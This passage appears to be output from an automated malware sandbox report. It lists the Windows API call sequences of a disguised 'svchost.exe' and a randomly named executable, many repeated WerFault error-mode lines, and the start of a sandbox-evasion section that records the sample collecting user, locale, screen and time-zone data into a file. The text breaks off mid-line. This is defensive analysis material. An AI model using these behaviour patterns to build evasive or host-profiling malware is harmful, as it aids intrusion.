Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_0264CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,2_2_0264CDC0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_0132D300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,5_2_0132D300
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_0132CD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,5_2_0132CD50
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_0132CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_0132CDC0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_0132CFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,5_2_0132CFE9
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 5_2_01329ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,5_2_01329ED0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013ED300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,6_2_013ED300
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013ECD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,6_2_013ECD50
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013ECDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_013ECDC0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013ECFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,6_2_013ECFE9
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 6_2_013E9ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,6_2_013E9ED0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0151D300 GetWindowLongA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetWindowLongA,SetWindowTextA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetDlgItem,GetClassLongA,SetClassLongA,SendMessageA,SendMessageA,GetObjectA,CreateFontIndirectA,SendMessageA,GetWindow,GetWindow,GetWindow,GetWindowInfo,GetWindowRect,SetWindowPos,GetClientRect,MoveWindow,CreateWindowExA,SetWindowLongA,GetClassLongA,SetClassLongA,GetWindowTextLengthA,HeapAlloc,SetWindowLongA,SendMessageA,GetWindowThreadProcessId,GetClassLongA,GetClassLongA,GetClassLongA,LoadIconA,SendMessageA,GetWindowLongA,SetWindowLongA,SetWindowPos,GetWindow,IsIconic,ShowWindow,WaitForSingleObject,ReleaseMutex,PostMessageA,GetDlgItem,GetWindowLongA,WaitForSingleObject,ReleaseMutex,GetDlgItem,GetWindowLongA,DeleteObject,HeapFree,DestroyWindow,EndDialog,8_2_0151D300
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0151CD50 IsWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,8_2_0151CD50
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0151CDC0 ReleaseMutex,GetWindow,WaitForSingleObject,GetWindow,IsWindow,GetWindow,IsIconic,GetWindow,GetWindowInfo,GetWindowInfo,GetWindow,GetAncestor,GetWindow,GetWindow,IsWindow,GetWindow,IsIconic,memset,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindow,GetWindowRect,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,8_2_0151CDC0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_0151CFE9 IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,IsWindow,IsIconic,memset,GetWindowRect,GetWindowLongA,GetScrollBarInfo,GetScrollBarInfo,GetScrollBarInfo,GetWindow,GetWindow,GetWindow,8_2_0151CFE9
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeCode function: 8_2_01519ED0 IsWindow,IsWindowVisible,IsIconic,GetLastActivePopup,8_2_01519ED0
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02655720 GetModuleHandleA,StrStrIA,GetProcAddress,memset,GetModuleFileNameA,AddVectoredExceptionHandler,CreateMutexA,CreateThread,GetHandleInformation,CloseHandle,InitializeCriticalSection,InitializeCriticalSection,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetUserObjectInformationA,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,LoadLibraryExA,GetProcAddress,GetCurrentProcessId,GetCurrentThreadId,GetThreadDesktop,GetUserObjectInformationA,lstrcmpiA,StrStrIA,StrStrIA,StrStrIA,StrStrIA,LoadLibraryExA,LoadLibraryExA,GetProcAddress,GetProcAddress,GetProcAddress,InitializeCriticalSection,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,LoadLibraryExA,GetProcAddress,2_2_02655720
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02644B00 PathAddBackslashA,CreateFileA,SetFilePointer,SetFilePointer,LockFile,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetModuleFileNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetUserNameA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetEnvironmentVariableA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetSystemDefaultLangID,memset,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDC,GetDeviceCaps,GetSystemMetrics,GetSystemMetrics,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetDateFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeFormatA,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,GetTimeZoneInformation,_snprintf,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,SetFilePointer,LockFile,WriteFile,UnlockFile,G